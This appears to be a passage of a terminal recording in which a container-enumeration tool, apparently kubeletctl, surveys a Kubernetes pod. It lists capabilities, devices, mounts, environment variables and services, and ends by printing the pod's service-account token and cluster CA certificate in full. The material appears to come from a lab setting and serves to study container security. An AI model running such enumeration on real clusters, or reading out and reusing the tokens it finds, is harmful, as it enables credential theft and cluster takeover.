[98.575592, "o", "\r\u001b[K| bounding    | [chown dac_override dac_read_search fowner fsetid kill setgid      |\r\n:\u001b[K"]
[98.606706, "o", "\r\u001b[K|             | setuid setpcap linux_immutable net_bind_service net_broadcast      |\r\n:\u001b[K"]
[98.632281, "o", "\r\u001b[K|             | net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio          |\r\n:\u001b[K"]
[98.661993, "o", "\r\u001b[K|             | sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice        |\r\n:\u001b[K"]
[98.696141, "o", "\r\u001b[K|             | sys_resource sys_time sys_tty_config mknod lease audit_write       |\r\n:\u001b[K"]
[98.726221, "o", "\r\u001b[K|             | audit_control setfcap mac_override mac_admin syslog wake_alarm     |\r\n:\u001b[K"]
[98.757414, "o", "\r\u001b[K|             | block_suspend audit_read]                                          |\r\n:\u001b[K"]
[98.783776, "o", "\r\u001b[K| ambient     | []                                                                 |\r\n:\u001b[K"]
[98.814555, "o", "\r\u001b[K+-------------+--------------------------------------------------------------------+\r\n:\u001b[K"]
[98.848317, "o", "\r\u001b[K### DEVICES ###\r\n:\u001b[K"]
[98.879641, "o", "\r\u001b[KComment: 147 devices are available.\r\n:\u001b[K"]
[98.907634, "o", "\r\u001b[K+-------------+-------+----------------------+--------------------+\r\n:\u001b[K"]
[99.084913, "o", "\r\u001b[K|     MODE    | ISDIR |        MODTIME       |        NAME        |\r\n:\u001b[K"]
[99.252586, "o", "\r\u001b[K+-------------+-------+----------------------+--------------------+\r\n:\u001b[K"]
[99.41879, "o", "\r\u001b[K| Dcrw-r--r-- | false | 2021-09-10T10:04:13Z | autofs             |\r\n:\u001b[K"]
[99.54981, "o", "\r\u001b[K| drwxr-xr-x  | true  | 2021-09-10T10:04:13Z | bsg                |"]
[99.551195, "o", "\r\n:\u001b[K"]
[102.479475, "o", "\r\u001b[K| Dcrw------- | false | 2021-09-10T10:04:13Z | btrfs-control      |\r\n:\u001b[K"]
[102.984602, "o", "\r\u001b[K"]
[102.985615, "o", "| Lrwxrwxrwx  | false | 2021-09-10T10:04:13Z | core               |\r\n:\u001b[K"]
[103.015965, "o", "\r\u001b[K| drwxr-xr-x  | true  | 2021-09-10T10:04:13Z | cpu                |\r\n:\u001b[K"]
[103.04347, "o", "\r\u001b[K| Dcrw------- | false | 2021-09-10T10:04:13Z | cpu_dma_latency    |\r\n:\u001b[K"]
[103.071579, "o", "\r\u001b[K| Lrwxrwxrwx  | false | 2021-09-10T10:04:13Z | fd                 |\r\n:\u001b[K"]
[103.106509, "o", "\r\u001b[K| Dcrw-rw-rw- | false | 2021-09-10T10:04:13Z | full               |\r\n:\u001b[K"]
[103.144768, "o", "\r\u001b[K| Dcrw-rw-rw- | false | 2021-09-10T10:04:13Z | fuse               |\r\n:\u001b[K"]
[103.161346, "o", "\r\u001b[K| Dcrw------- | false | 2021-09-10T10:04:13Z | hpet               |\r\n:\u001b[K"]
[103.192347, "o", "\r\u001b[K| Dcrw------- | false | 2021-09-10T10:04:13Z | hwrng              |\r\n:\u001b[K"]
[103.222538, "o", "\r\u001b[K| drwxr-xr-x  | true  | 2021-09-10T10:04:13Z | input              |\r\n:\u001b[K"]
[103.252633, "o", "\r\u001b[K| Dcrw-r--r-- | false | 2021-09-10T10:04:13Z | kmsg               |\r\n:\u001b[K"]
[103.282192, "o", "\r\u001b[K| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | loop-control       |\r\n:\u001b[K"]
[103.312097, "o", "\r\u001b[K| Drw-rw----  | false | 2021-09-10T10:04:13Z | loop0              |\r\n:\u001b[K"]
[103.342082, "o", "\r\u001b[K| Drw-rw----  | false | 2021-09-10T10:04:13Z | loop1              |\r\n:\u001b[K"]
[103.37312, "o", "\r\u001b[K| Drw-rw----  | false | 2021-09-10T10:04:13Z | loop2              |\r\n:\u001b[K"]
[103.402848, "o", "\r\u001b[K| Drw-rw----  | false | 2021-09-10T10:04:13Z | loop3              |\r\n:\u001b[K"]
[103.433186, "o", "\r\u001b[K| Drw-rw----  | false | 2021-09-10T10:04:13Z | loop4              |\r\n:\u001b[K"]
[103.462801, "o", "\r\u001b[K| Drw-rw----  | false | 2021-09-10T10:04:13Z | loop5              |\r\n:\u001b[K"]
[103.492786, "o", "\r\u001b[K| Drw-rw----  | false | 2021-09-10T10:04:13Z | loop6              |\r\n:\u001b[K"]
[103.522815, "o", "\r\u001b[K| Drw-rw----  | false | 2021-09-10T10:04:13Z | loop7              |\r\n:\u001b[K"]
[103.552824, "o", "\r\u001b[K"]
[103.55329, "o", "| drwxr-xr-x  | true  | 2021-09-10T10:04:13Z | mapper             |\r\n:\u001b[K"]
[103.583724, "o", "\r\u001b[K| Dcrw-r----- | false | 2021-09-10T10:04:13Z | mem                |\r\n:\u001b[K"]
[103.613725, "o", "\r\u001b[K| Dcrw------- | false | 2021-09-10T10:04:13Z | memory_bandwidth   |\r\n:\u001b[K"]
[103.64458, "o", "\r\u001b[K| dtrwxrwxrwx | true  | 2021-09-10T10:04:00Z | mqueue             |\r\n:\u001b[K"]
[103.675951, "o", "\r\u001b[K| drwxr-xr-x  | true  | 2021-09-10T10:04:13Z | net                |\r\n:\u001b[K"]
[103.706434, "o", "\r\u001b[K| Dcrw------- | false | 2021-09-10T10:04:13Z | network_latency    |\r\n:\u001b[K"]
[103.736643, "o", "\r\u001b[K| Dcrw------- | false | 2021-09-10T10:04:13Z | network_throughput |\r\n:\u001b[K"]
[103.766953, "o", "\r\u001b[K| Dcrw-rw-rw- | false | 2021-09-10T10:04:13Z | null               |\r\n:\u001b[K"]
[103.797191, "o", "\r\u001b[K| Dcrw------- | false | 2021-09-10T10:04:13Z | nvram              |\r\n:\u001b[K"]
[103.828037, "o", "\r\u001b[K| Dcrw-r----- | false | 2021-09-10T10:04:13Z | port               |\r\n:\u001b[K"]
[103.857055, "o", "\r\u001b[K| Lrwxrwxrwx  | false | 2021-09-10T10:04:13Z | ptmx               |\r\n:\u001b[K"]
[103.888442, "o", "\r\u001b[K| drwxr-xr-x  | true  | 2021-09-10T10:04:13Z | pts                |\r\n:\u001b[K"]
[104.070528, "o", "\r\u001b[K| Dcrw-rw-rw- | false | 2021-09-10T10:04:13Z | random             |"]
[104.071357, "o", "\r\n:\u001b[K"]
[104.245529, "o", "\r\u001b[K| Dcrw-rw-r-- | false | 2021-09-10T10:04:13Z | rfkill             |\r\n:\u001b[K"]
[104.619516, "o", "\r\u001b[K| Dcrw------- | false | 2021-09-10T10:04:13Z | rtc0               |\r\n| Drw-rw----  | false | 2021-09-10T10:04:13Z | sda                |\r\n| Drw-rw----  | false | 2021-09-10T10:04:13Z | sda1               |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | sg0                |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | sg1                |\r\n| dtrwxrwxrwx | true  | 2021-09-10T10:04:00Z | shm                |\r\n| Dcrw------- | false | 2021-09-10T10:04:13Z | snapshot           |\r\n| drwxr-xr-x  | true  | 2021-09-10T10:04:13Z | snd                |\r\n| Drw-rw----  | false | 2021-09-10T10:04:13Z | sr0                |\r\n| Lrwxrwxrwx  | false | 2021-09-10T10:04:13Z | stderr             |\r\n| Lrwxrwxrwx  | false | 2021-09-10T10:04:13Z | stdin              |\r\n| Lrwxrwxrwx  | false | 2021-09-10T10:04:13Z | stdout             |\r\n| -rw-rw-rw-  | false | 2021-09-10T10:04:13Z | termination-log    |\r\n| Dcrw-rw-rw- | false | 2021-09-10T10:04:13Z | tty                |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty0   "]
[104.619939, "o", "            |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty1               |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty10              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty11              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty12              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty13              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty14              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty15              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty16              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty17              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty18              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty19              |\r\n:\u001b[K"]
[105.192848, "o", "\r\u001b[K"]
[105.193757, "o", "| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty2               |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty20              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty21              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty22              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty23              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty24              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty25              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty26              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty27              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty28              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty29              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty3               |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty30              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty31              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty32      "]
[105.193908, "o", "        |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty33              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty34              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty35              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty36              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty37              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty38              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty39              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty4               |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty40              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty41              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty42              |\r\n:\u001b[K"]
[105.64765, "o", "\r\u001b[K| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty43              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty44              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty45              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty46              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty47              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty48              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty49              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty5               |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty50              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty51              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty52              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty53              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty54              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty55              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty56  "]
[105.647905, "o", "            |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty57              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty58              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty59              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty6               |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty60              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty61              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty62              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty63              |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty7               |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty8               |\r\n| Dcrw--w---- | false | 2021-09-10T10:04:13Z | tty9               |\r\n:\u001b[K"]
[106.097752, "o", "\r\u001b[K"]
[106.098486, "o", "| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | ttyS0              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | ttyS1              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | ttyS2              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | ttyS3              |\r\n| Dcrw-rw-rw- | false | 2021-09-10T10:04:13Z | urandom            |\r\n| Dcrw------- | false | 2021-09-10T10:04:13Z | usbmon0            |\r\n| Dcrw------- | false | 2021-09-10T10:04:13Z | vboxguest          |\r\n| Dcrw------- | false | 2021-09-10T10:04:13Z | vboxuser           |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcs                |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcs1               |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcs2               |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcs3               |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcs4               |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcs5               |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcs6       "]
[106.098763, "o", "        |\r\n| D"]
[106.100546, "o", "crw-rw---- | false | 2021-09-10T10:04:13Z | vcsa               |"]
[106.101089, "o", "\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsa1              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsa2              |\r\n"]
[106.102643, "o", "| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsa3              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsa4              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsa5              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsa6              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsu               |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsu1              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsu2              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsu3              |\r\n:\u001b[K"]
[106.549564, "o", "\r\u001b[K| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsu4              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsu5              |\r\n| Dcrw-rw---- | false | 2021-09-10T10:04:13Z | vcsu6              |\r\n| Dcrw------- | false | 2021-09-10T10:04:13Z | vga_arbiter        |\r\n| Dcrw------- | false | 2021-09-10T10:04:13Z | vhost-net          |\r\n| Dcrw------- | false | 2021-09-10T10:04:13Z | vhost-vsock        |\r\n| Dcrw-rw-rw- | false | 2021-09-10T10:04:13Z | zero               |\r\n+-------------+-------+----------------------+--------------------+\r\n### ENVIRONMENT ###\r\nComment: Typical Kubernetes API service env var was found, we might be running inside a pod.\r\n+-------------------------------+---------------------+\r\n|              NAME             |        VALUE        |\r\n+-------------------------------+---------------------+\r\n| KUBERNETES_PORT               | tcp://10.96.0.1:443 |\r\n| KUBERNETES_PORT_443_TCP_PORT  | 443                 |\r\n| KUBERNETES_PORT_443_TCP_PROTO | tcp                 |\r\n| KUBERNETE"]
[106.549984, "o", "S_SERVICE_HOST       | 10.96.0.1           |\r\n| KUBERNETES_SERVICE_PORT       | 443                 |\r\n| KUBERNETES_PORT_443_TCP_ADDR  | 10.96.0.1           |\r\n| KUBERNETES_SERVICE_PORT_HTTPS | 443                 |\r\n| KUBELETCTL_VERSION            | v1.8                |\r\n| KUBERNETES_PORT_443_TCP       | tcp://10.96.0.1:443 |\r\n+-------------------------------+---------------------+\r\n### MOUNT ###\r\nComment: 25 devices are mounted.\r\n+-----------+---------------------------------+------------+---------------------------------+\r\n:\u001b[K"]
[107.753924, "o", "\r\u001b[K|   DEVICE  |               PATH              | FILESYSTEM |              FLAGS              |\r\n:\u001b[K"]
[108.252614, "o", "\r\u001b[K+-----------+---------------------------------+------------+---------------------------------+\r\n:\u001b[K"]
[108.279265, "o", "\r\u001b[K| overlay   | /                               | overlay    | rw,relatime,lowerdir=/var/lib/d |\r\n:\u001b[K"]
[108.309947, "o", "\r\u001b[K|           |                                 |            | ocker/overlay2/l/CRJ24NDYS6DAYO |\r\n:\u001b[K"]
[108.340091, "o", "\r\u001b[K|           |                                 |            | QOUEBLFYEYLT:/var/lib/docker/ov |\r\n:\u001b[K"]
[108.37061, "o", "\r\u001b[K"]
[108.370824, "o", "|           |                                 |            | erlay2/l/XGOLF7UDE5WZNGKCUL5LSZ |\r\n:\u001b[K"]
[108.403382, "o", "\r\u001b[K|           |                                 |            | P55S:/var/lib/docker/overlay2/l |\r\n:\u001b[K"]
[108.43452, "o", "\r\u001b[K|           |                                 |            | /HXZUWDILE3YSGG5MPOCZR6BNWZ:/va |\r\n:\u001b[K"]
[108.466954, "o", "\r\u001b[K|           |                                 |            | r/lib/docker/overlay2/l/ZA6QTWL |\r\n:\u001b[K"]
[108.49739, "o", "\r\u001b[K|           |                                 |            | VKFOZ2IHJ4HDS7SEOJY:/var/lib/do |\r\n:\u001b[K"]
[108.521599, "o", "\r\u001b[K|           |                                 |            | cker/overlay2/l/KK3DIQHTOHTVBT5 |\r\n:\u001b[K"]
[108.551642, "o", "\r\u001b[K|           |                                 |            | HBSPNCZQVU5:/var/lib/docker/ove |\r\n:\u001b[K"]
[108.581725, "o", "\r\u001b[K|           |                                 |            | rlay2/l/BWYBEF44G5A5W4UR3KL47CD |\r\n:\u001b[K"]
[108.612035, "o", "\r\u001b[K|           |                                 |            | TAG:/var/lib/docker/overlay2/l/ |\r\n:\u001b[K"]
[109.487178, "o", "\r\u001b[K|           |                                 |            | 4F6RLRRFDHXAYLZNLKQ44YOTV7:/var |\r\n:\u001b[K"]
[109.988391, "o", "\r\u001b[K"]
[109.990741, "o", "|           |                                 |            | /lib/docker/overlay2/l/LU7JHFDO |\r\n:\u001b[K"]
[110.01719, "o", "\r\u001b[K|           |                                 |            | Z2OFEIFFFVQEGTJ23F:/var/lib/doc |"]
[110.018377, "o", "\r\n:\u001b[K"]
[110.057135, "o", "\r\u001b[K"]
[110.05915, "o", "|           |                                 |            | ker/overlay2/l/LWFXM7U7OZ3W5KPO |\r\n:\u001b[K"]
[110.074893, "o", "\r\u001b[K|           |                                 |            | ZJMHB62K3E:/var/lib/docker/over |\r\n:\u001b[K"]
[110.105117, "o", "\r\u001b[K|           |                                 |            | lay2/l/XKAJKPZTX6TVKKREPPU2BTS4 |\r\n:\u001b[K"]
[110.135349, "o", "\r\u001b[K|           |                                 |            | R4,upperdir=/var/lib/docker/ove |\r\n:\u001b[K"]
[110.170405, "o", "\r\u001b[K|           |                                 |            | rlay2/6329a77e6157b117b65beba7a |\r\n:\u001b[K"]
[110.200973, "o", "\r\u001b[K|           |                                 |            | 4b07711a60394649aaf29f7117cd480 |\r\n:\u001b[K"]
[110.231564, "o", "\r\u001b[K|           |                                 |            | 47c05353/diff,workdir=/var/lib/ |\r\n:\u001b[K"]
[110.261555, "o", "\r\u001b[K|           |                                 |            | docker/overlay2/6329a77e6157b11 |"]
[110.263816, "o", "\r\n:\u001b[K"]
[110.290971, "o", "\r\u001b[K|           |                                 |            | 7b65beba7a4b07711a60394649aaf29 |\r\n:\u001b[K"]
[110.318376, "o", "\r\u001b[K|           |                                 |            | f7117cd48047c05353/work         |\r\n:\u001b[K"]
[110.348198, "o", "\r\u001b[K| proc      | /proc                           | proc       | rw,nosuid,nodev,noexec,relatime |\r\n:\u001b[K"]
[110.378066, "o", "\r\u001b[K| tmpfs     | /dev                            | tmpfs      | rw,nosuid,size=65536k,mode=755  |\r\n:\u001b[K"]
[110.408142, "o", "\r\u001b[K| devpts    | /dev/pts                        | devpts     | rw,nosuid,noexec,relatime,gid=5 |\r\n:\u001b[K"]
[110.438098, "o", "\r\u001b[K|           |                                 |            | ,mode=620,ptmxmode=666          |\r\n:\u001b[K"]
[110.468863, "o", "\r\u001b[K| sysfs     | /sys                            | sysfs      | rw,nosuid,nodev,noexec,relatime |\r\n:\u001b[K"]
[110.638778, "o", "\r\u001b[K"]
[110.640547, "o", "| tmpfs     | /sys/fs/cgroup                  | tmpfs      | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,mode=755                       |\r\n| cgroup    | /sys/fs/cgroup/systemd          | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,xattr,release_agent=/usr/lib/s |\r\n|           |                                 |            | ystemd/systemd-cgroups-agent,na |\r\n|           |                                 |            | me=systemd                      |\r\n| cgroup    | /sys/fs/cgroup/net_cls,net_prio | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,net_cls,net_prio               |\r\n| cgroup    | /sys/fs/cgroup/cpu,cpuacct      | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,cpu,cpuacct                    |\r\n| cgroup    | /sys/fs/cgroup/pids             | cgroup     | rw,"]
[110.640819, "o", "nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,pids                           |\r\n| cgroup    | /sys/fs/cgroup/perf_event       | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,perf_event                     |\r\n| cgroup    | /sys/fs/cgroup/hugetlb          | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,hugetlb                        |\r\n| cgroup    | /sys/fs/cgroup/devices          | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,devices                        |\r\n| cgroup    | /sys/fs/cgroup/freezer          | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,freezer                        |\r\n| cgroup    | /sys/fs/cgroup/blkio            | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                   "]
[110.641091, "o", "              |    "]
[110.641679, "o", "        | ,blkio                          |\r\n| cgroup    | /sys/fs/cgroup/memory           | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,memory                         |\r\n| cgroup    | /sys/fs/cgroup/cpuset           | cgroup     | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,cpuset                         |\r\n:\u001b[K"]
[111.076992, "o", "\r\u001b[K| mqueue    | /dev/mqueue                     | mqueue     | rw,nosuid,nodev,noexec,relatime |\r\n| /dev/sda1 | /root/.scripts                  | ext4       | ro,relatime                     |\r\n| /dev/sda1 | /dev/termination-log            | ext4       | rw,relatime                     |\r\n| /dev/sda1 | /etc/resolv.conf                | ext4       | rw,relatime                     |\r\n| /dev/sda1 | /etc/hostname                   | ext4       | rw,relatime                     |\r\n| /dev/sda1 | /etc/hosts                      | ext4       | rw,relatime                     |\r\n| shm       | /dev/shm                        | tmpfs      | rw,nosuid,nodev,noexec,relatime |\r\n|           |                                 |            | ,size=65536k                    |\r\n| tmpfs     | /run/secrets/kubernetes.io/serv | tmpfs      | ro,relatime,size=2033280k       |\r\n|           | iceaccount                      |            |                                 |\r\n+-----------+---------------------------------+------------+"]
[111.077295, "o", "---------------------------------+\r\n### NAMESPACES ###\r\n+-----------+--------+---------------------------------------------+\r\n| NAMESPACE | ACTIVE |                   DETAILS                   |\r\n+-----------+--------+---------------------------------------------+\r\n| user      | false  |                                             |\r\n| pid       | true   | /proc/1/ns/pid device number is 232 Please  |\r\n|           |        | note that false only means that kubelet was |\r\n|           |        | found in /proc                              |\r\n+-----------+--------+---------------------------------------------+\r\n### RUNTIME ###\r\nComment: Container runtime \"docker\"\r\n\r\n### SERVICES ###\r\n+-----------------------------------------+------+\r\n|                 SERVICE                 | PORT |\r\n:\u001b[K"]
[112.592196, "o", "\r\u001b[K+-----------------------------------------+------+\r\n| kubernetes.default.svc.cluster.local.   |  443 |\r\n| kube-dns.kube-system.svc.cluster.local. |   53 |\r\n| kube-dns.kube-system.svc.cluster.local. | 9153 |\r\n"]
[112.59376, "o", "+-----------------------------------------+------+\r\n### TOKEN ###\r\nComment: A service account token is mounted.\r\n+-----------+---------------------------------------------+---------------------------------------------+\r\n| NAMESPACE |                    TOKEN                    |                      CA                     |\r\n+-----------+---------------------------------------------+---------------------------------------------+\r\n| default   | eyJhbGciOiJSUzI1NiIsImtpZCI6ImJ2SzAzc2RfSWd | -----BEGIN CERTIFICATE-----                 |\r\n|           | zUFJlOXZ5ZVNyZ1prYTZfXzVNOXl6Q3o0VC1ZVGtoNU | MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADA |"]
[112.594729, "o", "\r\n|           | 0ifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLm | VMRMwEQYDVQQDEwptaW5p                       |\r\n|           | RlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwI | a3ViZUNBMB4XDTIxMDMyMzE3MDAyMloXDTMxMDMyMjE |\r\n|           | joxNjYyODA0MjQwLCJpYXQiOjE2MzEyNjgyNDAsImlz | 3MDAyMlowFTETMBEGA1UE                       |\r\n|           | cyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN | AxMKb"]
[112.59719, "o", "WluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQA |\r\n|           | 2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pby | DggEPADCCAQoCggEBAM/6                       |\r\n|           | I6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7I | qEv1HWFmJZf5Y70T06F9+YUgBgVkKUifLIZcb8gmjKR |\r\n|           | m5hbWUiOiJhcHAtd2l0aC1yY2UiLCJ1aWQiOiJkMmQx | gROXHdlcAJHPHs7tZiFQ+                       |\r\n|           | ODQ4MC03YjNlLTQ2NjktODMyMC05MzA2YzZhNTdkNWE | YEv28E46k2qdXj61DTWQAK4ztyGguZIYeVkY5oia23s |\r\n|           | ifSwic2VydmljZWFjY291bnQiOnsibmFtZSI6ImRlZm | 6xFhByyqrHbinjSPqQaxm                       |\r\n|           | F1bHQiLCJ1aWQiOiJiYjZiNTc1Yi1hNWUzLTRhNDktO | xHerNE2ae/opzVJNYAYACdxGRorlRAN0OHS0lnCk+fl |\r\n|           | GQ5Zi0yM2IxMGFlNTA5NDMifSwid2FybmFmdGVyIjox | WjofLURzobtV54PEzMxov                       |\r\n|           | NjMxMjcxODQ3fSwibmJmIjoxNjMxMjY4MjQwLCJzdWI | iYoNOkrYVnFe/zryuQPndQmKqElvcz8HC2jYiSikTgd |\r\n|           | iOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdD | CrrGxXABf+kYxBanp7a0a                       |\r\n|           | pkZWZ"]
[112.597255, "o", "hdWx0In0.bkOQQCybXBldAR-96WHvXMmJKG_HP | LR/KDeD0Lv+xeRcQ8bbDVwUUy6VHif6k7tOspyiUWW6 |\r\n:\u001b[K"]
[114.06893, "o", "\r\u001b[K|           | cF6VJfOV6HNXZOCqzKFvbcTGq6Tnd0QIpPWWY_1xe7h | uNLAfwZXpzbE6gfdxUx5N                       |\r\n|           | 2oRIhfdZlxDIBsKY__gTH0ZxjHGO9zYDHxECu30JBZr | FGQTRNT7QMQy7DaEAJ8CAwEAAaNhMF8wDgYDVR0PAQH |\r\n|           | itBwBSP32RFPxRYRZDATywFtj0a4OOmLxqoLmNWmWFy | /BAQDAgKkMB0GA1UdJQQW                       |\r\n|           | DWigidImob9Lf150Tza2HVJfaxJMM4Z8FAXIIosNPff | MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8 |\r\n|           | TgAdzoSQG8NUiwGKOUGuIFhXrEX8lFNL0e-fUOpY-so | EBTADAQH/MB0GA1UdDgQW                       |\r\n|           | 3T-7x2q2T0N1Bu28i5K3FlJJaQVpuAKuB_2n57_elc6 | BBSPYIvBWy4s6dZE/Xo/fxd8ktn1aDANBgkqhkiG9w0 |\r\n|           | EOx7Ya6kpEcU3JUtY9ZiFTr3Gomdn6VzyGPtmWizPnk | BAQsFAAOCAQEApTKOMILF                       |\r\n|           | 12fUorQtzeaQ                                | 31MOdaMMAF/SEH9QAN/C7vvE2hE/7aWrtZhUtFFFRpn |\r\n|           |                                             | XBz2S4Xu+P1stEzqfHo6g                       |\r\n|           |                                            "]
[114.069354, "o", " | AEXJhWe9RAnCVmHhg3hA5405VHYggmR35WmrCDMqyaB |\r\n|           |                                             | Tpix0YnG1SXetYXE8vLnV                       |\r\n|           |                                             | tVHHmszW7y+h4S+ODovnxxI8eMqr7th0wI5GLjZTUnq |\r\n|           |                                             | zPKGt2l8NhqeaukDvbXth                       |\r\n|           |                                             | KpjekcEbxkaPDJt8AehuLZ/74qAGijMQOLKqXGuwGKC |\r\n|           |                                             | Tf/79PF6ldWCfHKbLpH0r                       |\r\n|           |                                             | tcSeGC5MulXMHEFP9ghLtizT3hQxE1c+//jXYxXt7Zw |\r\n|           |                                             | 6vurzntOPwZwvmYtcTVnM hfG5+fdkU2rIIA==      |\r\n|           |                                             | -----END CERTIFICATE-----                   